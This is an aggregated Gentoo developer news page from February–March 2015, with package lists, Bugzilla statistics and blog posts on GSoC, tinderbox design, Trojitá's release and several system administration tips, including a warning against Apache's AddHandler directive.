games-mud/mcl pacho 03 Feb 2015
media-gfx/photoprint pacho 03 Feb 2015
media-gfx/rawstudio pacho 03 Feb 2015
app-office/imposter pacho 03 Feb 2015
dev-python/cl pacho 03 Feb 2015
sci-physics/camfr pacho 03 Feb 2015
net-analyzer/nagios-imagepack pacho 03 Feb 2015
dev-python/orm pacho 03 Feb 2015
dev-python/testoob pacho 03 Feb 2015
app-misc/fixdos pacho 03 Feb 2015
app-arch/mate-file-archiver pacho 03 Feb 2015
app-editors/mate-text-editor pacho 03 Feb 2015
app-text/mate-document-viewer pacho 03 Feb 2015
app-text/mate-doc-utils pacho 03 Feb 2015
mate-base/libmatekeyring pacho 03 Feb 2015
mate-base/mate-file-manager pacho 03 Feb 2015
mate-base/mate-keyring pacho 03 Feb 2015
mate-extra/mate-character-map pacho 03 Feb 2015
mate-extra/mate-file-manager-image-converter pacho 03 Feb 2015
mate-extra/mate-file-manager-open-terminal pacho 03 Feb 2015
mate-extra/mate-file-manager-sendto pacho 03 Feb 2015
mate-extra/mate-file-manager-share pacho 03 Feb 2015
media-gfx/mate-image-viewer pacho 03 Feb 2015
net-wireless/mate-bluetooth pacho 03 Feb 2015
x11-libs/libmatewnck pacho 03 Feb 2015
x11-misc/mate-menu-editor pacho 03 Feb 2015
x11-wm/mate-window-manager pacho 03 Feb 2015
net-zope/zope-fixers pacho 03 Feb 2015
sys-apps/kmscon pacho 03 Feb 2015
app-office/teapot pacho 03 Feb 2015
net-irc/bitchx pacho 03 Feb 2015
sys-power/cpufrequtils pacho 03 Feb 2015
x11-plugins/gkrellm-cpufreq pacho 03 Feb 2015
media-sound/gnome-alsamixer pacho 03 Feb 2015
sys-devel/ac-archive pacho 03 Feb 2015
net-misc/emirror pacho 03 Feb 2015
net-wireless/wimax pacho 03 Feb 2015
net-wireless/wimax-tools pacho 03 Feb 2015
rox-extra/clock pacho 03 Feb 2015
app-arch/rpm5 pacho 03 Feb 2015
app-admin/gksu-polkit pacho 03 Feb 2015
sys-apps/uhinv pacho 03 Feb 2015
net-libs/pjsip pacho 03 Feb 2015
net-voip/sflphone pacho 03 Feb 2015
net-im/ekg pacho 03 Feb 2015
sys-firmware/iwl2000-ucode pacho 03 Feb 2015
sys-firmware/iwl2030-ucode pacho 03 Feb 2015
sys-firmware/iwl5000-ucode pacho 03 Feb 2015
sys-firmware/iwl5150-ucode pacho 03 Feb 2015
net-wireless/cinnamon-bluetooth pacho 03 Feb 2015
net-wireless/ussp-push pacho 03 Feb 2015
app-vim/zencoding-vim radhermit 09 Feb 2015
x11-drivers/psb-firmware chithanh 10 Feb 2015
x11-drivers/xf86-video-cyrix chithanh 10 Feb 2015
x11-drivers/xf86-video-impact chithanh 10 Feb 2015
x11-drivers/xf86-video-nsc chithanh 10 Feb 2015
x11-drivers/xf86-video-sunbw2 chithanh 10 Feb 2015
x11-libs/libdrm-poulsbo chithanh 10 Feb 2015
x11-libs/xpsb-glx chithanh 10 Feb 2015
app-admin/lxqt-admin yngwin 10 Feb 2015
net-misc/lxqt-openssh-askpass yngwin 10 Feb 2015
games-puzzle/trimines mr_bones_ 11 Feb 2015
games-action/cylindrix mr_bones_ 13 Feb 2015
net-analyzer/openvas-administrator jlec 14 Feb 2015
net-analyzer/greenbone-security-desktop jlec 14 Feb 2015
dev-ruby/flickr mrueg 19 Feb 2015
dev-ruby/gemcutter mrueg 19 Feb 2015
dev-ruby/drydock mrueg 19 Feb 2015
dev-ruby/net-dns mrueg 19 Feb 2015
virtual/ruby-rdoc mrueg 19 Feb 2015
media-fonts/libertine-ttf yngwin 22 Feb 2015
dev-perl/IP-Country zlogene 22 Feb 2015
net-dialup/gtk-imonc pinkbyte 27 Feb 2015


Package Developer Date
dev-python/jenkins-autojobs idella4 02 Feb 2015
net-analyzer/ntopng slis 03 Feb 2015
app-leechcraft/lc-intermutko maksbotan 03 Feb 2015
x11-drivers/xf86-input-libinput chithanh 04 Feb 2015
dev-python/cached-property cedk 05 Feb 2015
games-board/stockfish yngwin 05 Feb 2015
dev-util/shellcheck jlec 06 Feb 2015
app-admin/cgmanager hwoarang 07 Feb 2015
app-admin/restart_services mschiff 07 Feb 2015
app-portage/lightweight-cvs-toolkit mgorny 08 Feb 2015
lxqt-base/lxqt-admin yngwin 10 Feb 2015
lxqt-base/lxqt-openssh-askpass yngwin 10 Feb 2015
sys-apps/inxi dastergon 10 Feb 2015
dev-python/pyamf radhermit 10 Feb 2015
app-doc/clsync-docs bircoph 11 Feb 2015
dev-libs/libclsync bircoph 11 Feb 2015
app-admin/clsync bircoph 11 Feb 2015
dev-ruby/hiera-eyaml robbat2 12 Feb 2015
dev-ruby/gpgme robbat2 12 Feb 2015
dev-ruby/hiera-eyaml-gpg robbat2 12 Feb 2015
app-shells/mpibash ottxor 13 Feb 2015
dev-ruby/vcard mjo 14 Feb 2015
dev-ruby/ruby-ole mjo 14 Feb 2015
dev-ml/easy-format aballier 15 Feb 2015
dev-ml/biniou aballier 15 Feb 2015
dev-ml/yojson aballier 15 Feb 2015
app-i18n/ibus-libpinyin dlan 16 Feb 2015
dev-libs/libusbhp vapier 16 Feb 2015
media-tv/kodi vapier 16 Feb 2015
dev-python/blessings jlec 17 Feb 2015
dev-perl/ExtUtils-CChecker chainsaw 17 Feb 2015
dev-python/wcwidth jlec 17 Feb 2015
dev-python/curtsies jlec 17 Feb 2015
dev-perl/Socket-GetAddrInfo chainsaw 17 Feb 2015
dev-python/elasticsearch-curator idella4 17 Feb 2015
dev-java/oracle-javamail fordfrog 17 Feb 2015
net-misc/linuxptp tomjbe 18 Feb 2015
dev-haskell/preprocessor-tools slyfox 18 Feb 2015
dev-haskell/hsb2hs slyfox 18 Feb 2015
media-plugins/vdr-recsearch hd_brummy 20 Feb 2015
media-fonts/ohsnap yngwin 20 Feb 2015
sci-libs/Rtree slis 20 Feb 2015
media-plugins/vdr-dvbapi hd_brummy 20 Feb 2015
dev-ml/typerep_extended aballier 20 Feb 2015
media-fonts/lohit-assamese yngwin 20 Feb 2015
media-fonts/lohit-bengali yngwin 20 Feb 2015
media-fonts/lohit-devanagari yngwin 20 Feb 2015
media-fonts/lohit-gujarati yngwin 20 Feb 2015
media-fonts/lohit-gurmukhi yngwin 20 Feb 2015
media-fonts/lohit-kannada yngwin 20 Feb 2015
media-fonts/lohit-malayalam yngwin 20 Feb 2015
media-fonts/lohit-marathi yngwin 20 Feb 2015
media-fonts/lohit-nepali yngwin 20 Feb 2015
media-fonts/lohit-odia yngwin 20 Feb 2015
media-fonts/lohit-tamil yngwin 20 Feb 2015
media-fonts/lohit-tamil-classical yngwin 20 Feb 2015
media-fonts/lohit-telugu yngwin 20 Feb 2015
media-fonts/ipaex yngwin 21 Feb 2015
dev-perl/Unicode-Stringprep dilfridge 21 Feb 2015
dev-perl/Authen-SASL-SASLprep dilfridge 21 Feb 2015
dev-perl/Crypt-URandom dilfridge 21 Feb 2015
dev-perl/PBKDF2-Tiny dilfridge 21 Feb 2015
dev-perl/Exporter-Tiny dilfridge 21 Feb 2015
dev-perl/Type-Tiny dilfridge 21 Feb 2015
dev-perl/Authen-SCRAM dilfridge 21 Feb 2015
dev-perl/Safe-Isa dilfridge 21 Feb 2015
dev-perl/syntax dilfridge 21 Feb 2015
dev-perl/Syntax-Keyword-Junction dilfridge 21 Feb 2015
net-analyzer/monitoring-plugins mjo 21 Feb 2015
dev-perl/Validate-Tiny monsieurp 22 Feb 2015
sys-firmware/iwl7265-ucode prometheanfire 22 Feb 2015
media-fonts/libertine yngwin 22 Feb 2015
net-dns/hash-slinger mschiff 22 Feb 2015
dev-util/bitcoin-tx blueness 23 Feb 2015
dev-python/jsonfield jlec 24 Feb 2015
dev-lua/lualdap chainsaw 24 Feb 2015
media-fonts/powerline-symbols yngwin 24 Feb 2015
app-emacs/wgrep ulm 24 Feb 2015
dev-python/trollius radhermit 25 Feb 2015
dev-perl/Pegex dilfridge 25 Feb 2015
dev-perl/Inline-C dilfridge 25 Feb 2015
dev-perl/Test-YAML dilfridge 25 Feb 2015
dev-python/asyncio prometheanfire 26 Feb 2015
dev-python/aioeventlet prometheanfire 26 Feb 2015
dev-python/neovim-python-client yngwin 26 Feb 2015
dev-lua/messagepack yngwin 26 Feb 2015
dev-libs/unibilium yngwin 26 Feb 2015
dev-libs/libtermkey yngwin 26 Feb 2015
app-editors/neovim yngwin 26 Feb 2015
dev-python/prompt_toolkit jlec 27 Feb 2015
dev-python/ptpython jlec 27 Feb 2015
dev-python/oslo-log prometheanfire 28 Feb 2015
dev-python/tempest-lib prometheanfire 28 Feb 2015
dev-python/mistune jlec 28 Feb 2015
dev-python/terminado jlec 28 Feb 2015
dev-python/ghp-import alunduil 28 Feb 2015
dev-python/mysqlclient jlec 28 Feb 2015


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 February 2015 and 28 February 2015. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 1820
Closed 1519
Not fixed 281
Duplicates 162
Total 6621
Blocker 3
Critical 18
Major 68

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Games 188
2 Gentoo Security 52
3 Python Gentoo Team 45
4 Gentoo's Team for Core System packages 37
5 Gentoo KDE team 35
6 Gentoo X packagers 30
7 Gentoo Science Related Packages 29
8 Gentoo Perl team 29
9 Gentoo Linux Gnome Desktop Team 27
10 Others 1046


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Games 177
2 Gentoo Linux bug wranglers 133
3 Gentoo Security 66
4 Python Gentoo Team 50
5 Portage team 46
6 Gentoo KDE team 38
7 Gentoo X packagers 36
8 Gentoo's Team for Core System packages 36
9 Java team 35
10 Others 1202



Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to

Comments or Suggestions?

Please head over to this forum post.

Denis Dupeyron a.k.a. calchan (homepage, bugs)
Google Summer of Code 2015 (March 07, 2015, 06:45 UTC)

TL;DR: Gentoo not selected for GSoC 2015 ‘to make way for new orgs”. All is not lost: some Gentoo projects will be available within other organizations.

As you may have already noted, the Gentoo Foundation was not selected as a mentoring organization for GSoC 2015. Many immediately started to speculate why that happened.

Today I had an opportunity to talk (on irc) to Carol Smith, from Google’s Open Source Programs Office. I asked her why we had been rejected, if they had seen any issue with our application to GSoC, and if she had comments about it. Here’s what her answer was:

yeah, i’m sorry that this is going to be disappointing
but this was just us trying to make way for new orgs this year :-(
i don’t see anything wrong with your ideas page or application, it looks good

Then I asked her the following:

one discussion we had after our rejection is if we should keep focusing on doing GSoC to attract contributors as we’ve been doing, or focus more on having projects actually be implemented, and how much you cared about it

To which she replied:

well, i’ll say that wasn’t a factor in this rejection
having said that, we in general like to see more new developers instead of the same ones year over year
we’d prefer gsoc was used to attract new members of the community
but like i said, that wasn’t a factor in your case

It’s pretty clear we haven’t done anything wrong, and that they like what we do and the way we do it. Which doesn’t mean we can’t improve, by the way. I know Carol well enough to be sure she was not dodging my questions to politely brush me aside. She says things as they are.

So, what happened then? First, the overall number of accepted organizations went down roughly 30% compared to last year. The immediate thought which comes to mind is “budget cut”. Maybe. But the team who organizes GSoC is largely the same year over year. You can’t indefinitely grow an organization at constant manpower. And last year was big.

Second, and probably the main reason why we were rejected is that this year small and/or newer organizations were favored. This was explicitly said by Carol (and I believe others) multiple times. I’m sure some of you will argue that this isn’t a good idea, but the fact is it’s their program and they run it the way they want. I will certainly not blame them. This does not mean no large organizations were selected, but that tough choices had to be made among them.

In my opinion, Carol’s lack of words to explain why we were not selected meant “not bad but not good enough”. The playing field is improving every year. We surely felt a little too confident and now have to step up our game. I have ideas for next year, these will be discussed in due time.

In the meantime, some Gentoo projects will be available within other organizations. I will not talk about what hasn’t been announced yet, but I can certainly make this one official:
glee: Gentoo-based Linux appliances on Minnowboard
If you’re interested, feel free to contact me directly.

March 06, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Trying out Pelican, part one (March 06, 2015, 18:02 UTC)

One of the goals I’ve set myself to do this year (not as a new year resolution though, I *really* want to accomplish this ;-) is to move my blog from WordPress to a statically built website. And Pelican looks to be a good solution to do so. It’s based on Python, which is readily available and supported on Gentoo, and is quite readable. Also, it looks to be very active in development and support. And also: it supports taking data from an existing WordPress installation, so that none of the posts are lost (with some rounding error that’s inherit to such migrations of course).

Before getting Pelican ready (which is available through Gentoo btw) I also needed to install pandoc, and that became more troublesome than expected. While installing pandoc I got hit by its massive amount of dependencies towards dev-haskell/* packages, and many of those packages really failed to install. It does some internal dependency checking and fails, informing me to run haskell-updater. Sadly, multiple re-runs of said command did not resolve the issue. In fact, it wasn’t until I hit a forum post about the same issue that a first step to a working solution was found.

It turns out that the ~arch versions of the haskell packages are better working. So I enabled dev-haskell/* in my package.accept_keywords file. And then started updating the packages… which also failed. Then I ran haskell-updater multiple times, but that also failed. After a while, I had to run the following set of commands (in random order) just to get everything to build fine:

~# emerge -u $(qlist -IC dev-haskell) --keep-going
~# for n in $(qlist -IC dev-haskell); do emerge -u $n; done

It took quite some reruns, but it finally got through. I never thought I had this much Haskell-related packages installed on my system (89 packages here to be exact), as I never intended to do any Haskell development since I left the university. Still, I finally got pandoc to work. So, on to the migration of my WordPress site… I thought.

This is a good time to ask for stabilization requests (I’ll look into it myself as well of course) but also to see if you can help out our arch testing teams to support the stabilization requests on Gentoo! We need you!

I started with the official docs on importing. Looks promising, but it didn’t turn out too well for me. Importing was okay, but then immediately building the site again resulted in issues about wrong arguments (file names being interpreted as an argument name or function when an underscore was used) and interpretation of code inside the posts. Then I found Jason Antman’s converting wordpress posts to pelican markdown post to inform me I had to try using markdown instead of restructured text. And lo and behold – that’s much better.

The first builds look promising. Of all the posts that I made on WordPress, only one gives a build failure. The next thing to investigate is theming, as well as seeing how good the migration goes (it isn’t because there are no errors otherwise that the migration is successful of course) so that I know how much manual labor I have to take into consideration when I finally switch (right now, I’m still running WordPress).

March 05, 2015
Paweł Hajdan, Jr. a.k.a. phajdan.jr (homepage, bugs)

I've been occasionally hitting frustrating issues with bash history getting lost after a crash. Then I found this great blog post about keeping bash history in sync on disk and between multiple terminals.

tl;dr is to use "shopt -s histappend" and PROMPT_COMMAND="${PROMPT_COMMAND};history -a"

The first is usually default, and results in sane behavior when you have multiple bash sessions at the same time. Now the second one ("history -a") is really useful to flush the history to disk in case of crashes.

I'm happy to announce that both are now default in Gentoo! Please see bug #517342 for reference.

February 26, 2015
Service relaunch: (February 26, 2015, 23:02 UTC)

The Gentoo Infrastructure team is proud to announce that we have re-engineered the mailing list archives, and re-launched it, back at The prior Mhonarc-based system had numerous problems, and a complete revamp was deemed the best forward solution to move forward with. The new system is powered by ElasticSearch (more features to come).

All existing URLs should either work directly, or redirect you to the new location for that content.

Major thanks to Alex Legler, for his development of this project.

Note that we're still doing some catchup on newer messages, but delays will drop to under 2 hours soon, with an eventual goal of under 30 minutes.

Please report problems to Bugzilla: Product Websites, Component Archives

February 24, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
TG4: Tinderbox Generation 4 (February 24, 2015, 21:08 UTC)

Everybody's a critic: the first comment I received when I showed other Gentoo developers my previous post about the tinderbox was a question on whether I would be using pkgcore for the new generation tinderbox. If you have understood what my blog post was about, you probably understand why I was not happy about such a question.

I thought the blog post made it very clear that my focus right now is not to change the way the tinderbox runs but the way the reporting pipeline works. This is the same problem as 2009: generating build logs is easy, sifting through them is not. At first I thought this was hard just for me, but the fact that GSoC attracted multiple people interested in doing continuous build, but not one interested in logmining showed me this is just a hard problem.

The approach I took last time, with what I'll start calling TG3 (Tinderbox Generation 3), was to: highlight the error/warning messages; provide a list of build logs for which a problem was identified (without caring much for which kind of problem), and just showing up broken builds or broken tests in the interface. This was easy to build up, and to a point to use, but it had a lots of drawbacks.

Major drawbacks in that UI is that it relies on manual work to identify open bugs for the package (and thus make sure not to report duplicate bugs), and on my own memory not to report the same issue multiple time, if the bug was closed by some child as NEEDINFO.

I don't have my graphic tablet with me to draw a mock of what I have in mind yet, but I can throw in some of the things I've been thinking of:

  • Being able to tell what problem or problems a particular build is about. It's easy to tell whether a build log is just a build failure or a test failure, but what if instead it has three or four different warning conditions? Being able to tell which ones have been found and having a single-click bug filing system would be a good start.
  • Keep in mind the bugs filed against a package. This is important because sometimes a build log is just a repeat of something filed already; it may be that it failed multiple times since you started a reporting run, so it might be better to show that easily.
  • Related, it should collapse failures for packages so not to repeat the same package multiple times on the page. Say you look at the build failures every day or two, you don't care if the same package failed 20 times, especially if the logs report the same error. Finding out whether the error messages are the same is tricky, but at least you can collapse the multiple logs in a single log per package, so you don't need to skip it over and over again.
  • Again related, it should keep track of which logs have been read and which weren't. It's going to be tricky if the app is made multi-user, but at least a starting point needs to be there.
  • It should show the three most recent bugs open for the package (and a count of how many other open bugs) so that if the bug was filed by someone else, it does not need to be filed again. Bonus points for showing the few most recently reported closed bugs too.

You can tell already that this is a considerably more complex interface than the one I used before. I expect it'll take some work with JavaScript at the very least, so I may end up doing it with AngularJS and Go mostly because that's what I need to learn at work as well, don't get me started. At least I don't expect I'll be doing it in Polymer but I won't exclude that just yet.

Why do I spend this much time thinking and talking (and soon writing) about UI? Because I think this is the current bottleneck to scale up the amount of analysis of Gentoo's quality. Running a tinderbox is getting cheaper — there are plenty of dedicated server offers that are considerably cheaper than what I paid for hosting Excelsior, let alone the initial investment in it. And this is without going to look again at the possible costs of running them on GCE or AWS at request.

Three years ago, my choice of a physical server in my hands was easier to justify than now, with 4-core HT servers with 48GB of RAM starting at €40/month — while I/O is still the limiting factor, with that much RAM it's well possible to have one tinderbox building fully in tmpfs, and just run a separate server for a second instance, rather than sharing multiple instances.

And even if GCE/AWS instances that are charged for time running are not exactly interesting for continuous build systems, having a cloud image that can be instructed to start running a tinderbox with a fixed set of packages, say all the reverse dependencies of libav, would make it possible to run explicit tests for code that is known to be fragile, while not pausing the main tinderbox.

Finally, there are different ideas of how we should be testing packages: all options enabled, all options disabled, multilib or not, hardened or not, one package at a time, all packages together… they can all share the same exact logmining pipeline, as all it needs is the emerge --info output, and the log itself, which can have markers for known issues to look out for or not. And then you can build the packages however you desire, as long as you can submit them there.

Now my idea is not to just build this for myself and run analysis over all the people who want to submit the build logs, because that would be just about as crazy. But I think it would be okay to have a shared instance for Gentoo developers to submit build logs from their own personal instances, if they want to, and then have them look at their own accounts only. It's not going to be my first target but I'll keep that in mind when I start my mocks and implementations, because I think it might prove successful.

February 23, 2015
Jan Kundrát a.k.a. jkt (homepage, bugs)
Trojita 0.5 is released (February 23, 2015, 11:02 UTC)

Hi all,
we are pleased to announce version 0.5 of Trojitá, a fast Qt IMAP e-mail client. More than 500 changes went in since the previous release, so the following list highlights just a few of them:

  • Trojitá can now be invoked with a mailto: URL (RFC 6068) on the command line for composing a new email.
  • Messages can be forwarded as attachments (support for inline forwarding is planned).
  • Passwords can be remembered in a secure, encrypted storage via QtKeychain.
  • E-mails with attachments are decorated with a paperclip icon in the overview.
  • Better rendering of e-mails with extraordinary MIME structure.
  • By default, only one instance is kept running, and can be controlled via D-Bus.
  • Trojitá now provides better error reporting, and can reconnect on network failures automatically.
  • The network state (Offline, Expensive Connection or Free Access) will be remembered across sessions.
  • When replying, it is now possible to retroactively change the reply type (Private Reply, Reply to All but Me, Reply to All, Reply to Mailing List, Handpicked).
  • When searching in a message, Trojitá will scroll to the current match.
  • Attachment preview for quick access to the enclosed files.
  • The mark-message-read-after-X-seconds setting is now configurable.
  • The IMAP refresh interval is now configurable.
  • Speed and memory consumption improvements.
  • Miscellaneous IMAP improvements.
  • Various fixes and improvements.
  • We have increased our test coverage, and are now making use of an improved Continuous Integration setup with pre-commit patch testing.

This release has been tagged in git as "v0.5". You can also download a tarball (GPG signature). Prebuilt binaries for multiple distributions are available via the OBS, and so is a Windows installer.

We would like to thank Karan Luthra and Stephan Platz for their efforts during Google Summer of Code 2014.

The Trojitá developers

  • Jan Kundrát
  • Pali Rohár
  • Dan Chapman
  • Thomas Lübking
  • Stephan Platz
  • Boren Zhang
  • Karan Luthra
  • Caspar Schutijser
  • Lasse Liehu
  • Michael Hall
  • Toby Chen
  • Niklas Wenzel
  • Marko Käning
  • Bruno Meneguele
  • Yuri Chornoivan
  • Tomáš Chvátal
  • Thor Nuno Helge Gomes Hultberg
  • Safa Alfulaij
  • Pavel Sedlák
  • Matthias Klumpp
  • Luke Dashjr
  • Jai Luthra
  • Illya Kovalevskyy
  • Edward Hades
  • Dimitrios Glentadakis
  • Andreas Sturmlechner
  • Alexander Zabolotskikh

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The tinderbox is dead, long live the tinderbox (February 23, 2015, 03:24 UTC)

I announced it last November and now it became reality: the Tinderbox is no more, in hardware as well as software. Excelsior was taken out of the Hurricane Electric facility in Fremont this past Monday, just before I left for SCALE13x.

Originally the box was hosted by my then-employer, but as of last year, to allow more people to have access to is working, I had it moved to my own rented cabinet, at a figure of $600/month. Not chump change, but it was okay for a while; unfortunately the cost sharing option that was supposed to happen did not happen, and about an year later those $7200 do not feel like a good choice, and this is without delving into the whole insulting behavior of a fellow developer.

Right now the server is lying on the floor of an office in the Mountain View campus of my (current) employer. The future of the hardware is uncertain right now, but it's more likely than not going to be donated to Gentoo Foundation (minus the HDDs for obvious opsec). I'm likely going to rent a dedicated server of my own for development and testing, as even though they would be less powerful than Excelsior, they would be massively cheaper at €40/month.

The question becomes what we want to do with the idea of a tinderbox — it seems like after I announced the demise people would get together to fix it once and for all, but four months later there is nothing to show that. After speaking with other developers at SCaLE, and realizing I'm probably the only one with enough domain knowledge of the problems I tackled, at this point, I decided it's time for me to stop running a tinderbox and instead design one.

I'm going to write a few more blog posts to get into the nitty-gritty details of what I plan on doing, but I would like to provide at least a high-level idea of what I'm going to change drastically in the next iteration.

The first difference will be the target execution environment. When I wrote the tinderbox analysis scripts I designed them to run in a mostly sealed system. Because the tinderbox was running at someone else's cabinet, within its management network, I decided I would not provide any direct access to either the tinderbox container nor the app that would mangle that data. This is why the storage for both the metadata and the logs was Amazon: pushing the data out was easy and did not require me to give access to the system to anyone else.

In the new design this will not be important — not only because it'll be designed to push the data directly into Bugzilla, but more importantly because I'm not going to run a tinderbox in such an environment. Well, admittedly I'm just not going to run a tinderbox ever again, and will just build the code to do so, but the whole point is that I won't keep that restriction on to begin with.

And since the data store now is only temporary, I don't think it's worth over-optimizing for performance. While I originally considered and dropped the option of storing the logs in PostgreSQL for performance reasons, now this is unlikely to be a problem. Even if the queries would take seconds, it's not like this is going to be a deal breaker for an app with a single user. Even more importantly, the time taken to create the bug on the Bugzilla side is likely going to overshadow any database inefficiency.

The part that I've still got some doubts about is how to push the data from the tinderbox instance to the collector (which may or may not be the webapp that opens the bugs too.) Right now the tinderbox does some analysis through bashrc, leaving warnings in the log — the log is then sent to the collector through -chewing gum and saliva- tar and netcat (yes, really) to maintain one single piece of metadata: the filename.

I would like to be able to collect some metadata on the tinderbox side (namely, emerge --info, which before was cached manually) and send it down to the collector. But adding this much logic is tricky, as the tinderbox should still operate with most of the operating system busted. My original napkin plan involved having the agent written in Go, using Apache Thrift to communicate to the main app, probably written in Django or similar.

The reason why I'm saying that Go would be a good fit is because of one piece of its design I do not like (in the general use case) at all: the static compilation. A Go binary will not break during a system upgrade of any runtime, because it has no runtime; which is in my opinion a bad idea for a piece of desktop or server software, but it's a godsend in this particular environment.

But the reason for which I was considering Thrift was I didn't want to look into XML-RPC or JSON-RPC. But then again, Bugzilla supports only those two, and my main concern (the size of the log files) would still be a problem when attaching them to Bugzilla just as much. Since Thrift would require me to package it for Gentoo (seems like nobody did yet), while JSON-RPC is already supported in Go, I think it might be a better idea to stick with the JSON. Unfortunately Go does not support UTF-7 which would make escaping binary data much easier.

Now what remains a problem is filing the bug and attaching the log to Bugzilla. If I were to write that part of the app in Python, it would be just a matter of using the pybugz libraries to handle it. But with JSON-RPC it should be fairly easy to implement support for it from scratch (unlike XML-RPC) so maybe it's worth just doing the whole thing in Go, and reduce the proliferation of languages in use for such a project.

Python will remain in use for the tinderbox runner. Actually if anything I would like to remove the bash wrapper I've written and do the generation and selection of which packages to build in Python. It would also be nice if it could handle the USE mangling by itself, but that's difficult due to the sad conflicting requirements of the tree.

But this is enough details for the moment; I'll go back to thinking the implementation through and add more details about that as I get to them.

February 21, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)


On a rather young Gentoo setup of mine I ran into SSLV3_ALERT_HANDSHAKE_FAILURE from rss2email.
Plain Python showed it, too:

# python -c "import urllib2; \
    urllib2.urlopen('')" \
    |& tail -n 1
urllib2.URLError: <urlopen error [SSL: SSLV3_ALERT_HANDSHAKE_FAILURE] \
    sslv3 alert handshake failure (_ssl.c:581)>

On other machines this yields

urllib2.HTTPError: HTTP Error 403: Forbidden


It turned out I overlooked USE="bindist ..." in /etc/portage/make.conf which is sitting there by default.
On OpenSSL, bindist disables elliptic curve support. So that is where the SSLV3_ALERT_HANDSHAKE_FAILURE came from.

February 17, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)
Google Summer of Code 2015 (February 17, 2015, 04:47 UTC)

This is a quick informational message about GSoC 2015.

The Gentoo Foundation is in the process of applying to GSoC 2015 as an organization. This is the 10th year we’ll participate to this very successful and exciting program.

Right now, we need you to propose project ideas. You do not need to be a developer to propose an idea. First, open this link in a new tab/window. Change the title My_new_idea in the URL to the actual title, load the page again, fill in all the information and save the article. Then, edit the ideas page and include a link to it. If you need any help with this, or advice regarding the description or your idea, come talk to us in #gentoo-soc on Freenode.


February 15, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Apache AddHandler madness all over the place (February 15, 2015, 21:44 UTC)


A friend of mine ran into known (though not well-known) security issues with Apache’s AddHandler directive.
Basically, Apache configuration like

# Avoid!
AddHandler php5-fcgi .php

applies to a file called evilupload.php.png, too. Yes.
Looking at the current Apache documentation, it should clearly say that AddHandler should not be used any more for security reasons.
That’s what I would expect. What I find as of 2015-02-15 looks different:

Maybe that’s why AddHandler is still proposed all across the Internet:

And maybe that’s why it made its way into app-admin/eselect-php (bug #538822).

Please join the fight. Time to get AddHandler off the Internet!

I ❤ Free Software 2015-02-14 (February 15, 2015, 20:19 UTC)

I’m late. So what :)

I love Free Software!

February 08, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Have dhcpcd wait before backgrounding (February 08, 2015, 14:50 UTC)

Many of my systems use DHCP for obtaining IP addresses. Even though they all receive a static IP address, it allows me to have them moved over (migrations), use TFTP boot, cloning (in case of quick testing), etc. But one of the things that was making my efforts somewhat more difficult was that the dhcpcd service continued (the dhcpcd daemon immediately went in the background) even though no IP address was received yet. Subsequent service scripts that required a working network connection failed to start then.

The solution is to configure dhcpcd to wait for an IP address. This is done through the -w option, or the waitip instruction in the dhcpcd.conf file. With that in place, the service script now waits until an IP address is assigned.

February 05, 2015

There has recently been a discussion among developers about the default choice of ffmpeg/libav in Gentoo. Until recently, libav was the default implicitly by being the first dependency of virtual/ffmpeg. Now the choice has been made explicit to libav in the portage profiles, and a news item regarding this was published.

In order to get a data point which might be useful for the discussion, I have created a poll in the forum, where Gentoo users can state their preference about the default:

You are welcome to vote in the poll, and if you wish also state your reasons in a comment. However, as the topic of ffmpeg/libav split has been discussed extensively already, I ask you to not restart that discussion in the forum thread.

February 03, 2015
Gentoo Monthly Newsletter: January 2015 (February 03, 2015, 22:00 UTC)

Gentoo News

Council News

One topic addressed in the January council meeting was what happens if a developer wants to join a project and contribute and sends e-mail to the  project or its lead, but noone picks up the phone or answers e-mails there… General agreement was that after applying for project membership and some waiting time without any response one should just “be bold”, add oneself to  the project and start contributing in a responsible fashion.

A second item was the policy for long-term masked packages. Since a mask message is much more visible than, say, a post-installation warning, the  decision was that packages with security vulnerabilities may remain in tree  package-masked, assuming there are no replacements for them and they have active maintainers. Naturally the mask message must clearly spell out the problems with the package.

Unofficial Gentoo Portage Git Mirror

Thanks to Sven Wegener and Michał Górny, we now have an unofficial Gentoo Portage git mirror. Below is the announcement as posted in the mailing lists

Hello, everyone.

I have the pleasure to announce that the official rsync2git mirroris up and running [1] thanks to
Sven Wegener. It is updated from rsync every 30 minutes, and can be used both to sync your local
Gentoo installs and to submit improvements via pull requests (see README [2] for some details).

At the same time, I have established the 'Git Mirror' [3] project which welcomes developers
willing to help reviewing the pull requests and helping those improvements reach
package maintainers.

For users, this means that we now have a fairly efficient syncing
method and a pull request-based workflow for submitting fixes.
The auto-synced repository can also make proxy-maint workflow easier.

For developers, this either means:

a. if you want to help us, join the team, watch the pull requests.
CC maintainers when appropriate, review, even work towards merging
the changes with approval of the maintainers,

b. if you want to support git users, just wait till we CC you and then review, help, merge :),

c. if you don't want to support git users, just ignore the repo. We'll bother you
directly after the changes are reviewed and ready :).


Gentoo Developer Moves


Gentoo is made up of 246 active developers, of which 36 are currently away.
Gentoo has recruited a total of 807 developers since its inception.


  • Manuel Rüger joined the python and QA teams
  • Mikle Kolyada joined the PPC team
  • Sergey Popov joined the s390 team and left the Qt team
  • Michał Górny joined the git mirror and overlays teams
  • Mark Wright joined the mathematics and haskell teams
  • Samuel Damashek left the gentoo-keys team
  • Matt Thode left the gentoo-keys team



This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 164
Packages 17977
Ebuilds 37150
Architecture Stable Testing Total % of Packages
alpha 3538 676 4214 23.44%
amd64 10889 6598 17487 97.27%
amd64-fbsd 2 1586 1588 8.83%
arm 2681 1869 4550 25.31%
arm64 536 88 624 3.47%
hppa 3107 499 3606 20.06%
